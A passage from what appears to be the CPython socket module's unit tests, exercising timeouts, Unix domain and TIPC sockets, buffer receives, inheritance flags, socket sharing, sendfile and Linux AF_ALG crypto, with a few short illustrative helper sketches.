self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
@unittest.skipIf(sys.platform == 'OpenVMS', 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS get_inheritable does not work?')
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
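# Illustrative sketch (not part of the test suite): the timeout/blocking
# semantics that checkNonblock() verifies above. A socket with a positive
# timeout still reports getblocking() == True at the Python level, even
# though its file descriptor is internally non-blocking.
def _demo_timeout_blocking_semantics():
    with socket.socket() as demo:
        demo.settimeout(2.0)
        assert demo.getblocking() and demo.gettimeout() == 2.0
        demo.setblocking(False)  # equivalent to demo.settimeout(0.0)
        assert not demo.getblocking() and demo.gettimeout() == 0.0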
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be a classmethod and not a staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking sockets,
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
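# Illustrative sketch (not part of the test suite): the Windows-only
# share()/fromshare() handoff that TestSocketSharing exercises above.
# "q" and "target_pid" are assumptions supplied by the caller, e.g. a
# multiprocessing.Queue and the pid of the receiving process.
def _demo_socket_share(q, target_pid):
    listener = socket.create_server(("127.0.0.1", 0))
    q.put(listener.share(target_pid))  # opaque bytes blob
    listener.close()
    # The receiving process then rebuilds the socket:
    #     listener = socket.fromshare(q.get())
    #     conn, addr = listener.accept()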
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run, return either the send()
# or the sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non-blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
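# Illustrative sketch (not part of the test suite): the public
# socket.sendfile() call whose two private backends the classes above
# exercise. "path" and "address" are assumptions supplied by the caller.
def _demo_sendfile(path, address):
    with open(path, 'rb') as file, socket.create_connection(address) as sock:
        # Skips the first 512 bytes and sends at most 4096 bytes;
        # internally uses os.sendfile() when available and falls back
        # to plain send() otherwise.
        return sock.sendfile(file, offset=512, count=4096)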
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernels older than 4.5, sendto() failed with ENOKEY,
# at least on the ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer, the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
